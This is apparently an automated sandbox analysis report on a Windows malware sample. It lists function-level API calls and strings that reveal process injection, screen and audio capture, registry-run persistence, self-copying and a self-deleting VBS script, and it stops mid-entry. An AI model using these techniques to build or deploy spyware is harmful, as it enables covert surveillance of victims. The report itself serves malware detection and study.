                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                      • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                      • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                      • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                      • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                      • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                      • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                      • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                      • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                      • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                        • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                      • DeleteDC.GDI32(00000000), ref: 00418F2A
                                      • DeleteDC.GDI32(00000000), ref: 00418F2D
                                      • DeleteObject.GDI32(00000000), ref: 00418F30
                                      • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                      • DeleteDC.GDI32(00000000), ref: 00418F62
                                      • DeleteDC.GDI32(00000000), ref: 00418F65
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                      • GetIconInfo.USER32(?,?), ref: 00418FBD
                                      • DeleteObject.GDI32(?), ref: 00418FEC
                                      • DeleteObject.GDI32(?), ref: 00418FF9
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                      • DeleteDC.GDI32(?), ref: 0041917C
                                      • DeleteDC.GDI32(00000000), ref: 0041917F
                                      • DeleteObject.GDI32(00000000), ref: 00419182
                                      • GlobalFree.KERNEL32(?), ref: 0041918D
                                      • DeleteObject.GDI32(00000000), ref: 00419241
                                      • GlobalFree.KERNEL32(?), ref: 00419248
                                      • DeleteDC.GDI32(?), ref: 00419258
                                      • DeleteDC.GDI32(00000000), ref: 00419263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369
                                      • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                      • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                      • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                      • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                      • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                      • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                      • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                      • ResumeThread.KERNEL32(?), ref: 00418435
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                      • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                      • GetLastError.KERNEL32 ref: 0041847A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                      • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                      • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                      • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                      • ExitProcess.KERNEL32 ref: 0040D7D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                      • API String ID: 1861856835-332907002
                                      • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                      • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                      • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                      • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                      • ExitProcess.KERNEL32 ref: 0040D419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-2557013105
                                      • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                      • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                      • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                      • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                      • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                      • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                      • GetCurrentProcessId.KERNEL32 ref: 00412541
                                      • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                      • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                      • Sleep.KERNEL32(000001F4), ref: 00412682
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                      • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                      • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: .exe$8SG$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-436679193
                                      • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                      • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                      • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                      • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                      • SetEvent.KERNEL32 ref: 0041B219
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                      • CloseHandle.KERNEL32 ref: 0041B23A
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                      • API String ID: 738084811-2094122233
                                      • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                      • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                      • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                      • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                      • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                      • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                      • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                      • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                      • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                      • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: C:\Users\user\AppData\Roaming\NvbYSEq.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                      • API String ID: 1646373207-1450517273
                                      • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                      • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                      • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                      • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0040CE07
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                      • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                      • _wcslen.LIBCMT ref: 0040CEE6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                      • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000000,00000000), ref: 0040CF84
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                      • _wcslen.LIBCMT ref: 0040CFC6
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                      • ExitProcess.KERNEL32 ref: 0040D062
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                      • String ID: 6$C:\Users\user\AppData\Roaming\NvbYSEq.exe$del$open
                                      • API String ID: 1579085052-552931864
                                      • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                      • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                      • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                      • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?), ref: 0041C036
                                      • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                      • lstrlenW.KERNEL32(?), ref: 0041C067
                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                      • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                      • _wcslen.LIBCMT ref: 0041C13B
                                      • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                      • GetLastError.KERNEL32 ref: 0041C173
                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                      • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                      • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                      • GetLastError.KERNEL32 ref: 0041C1D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                      • String ID: ?
                                      • API String ID: 3941738427-1684325040
                                      • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                      • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                      • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
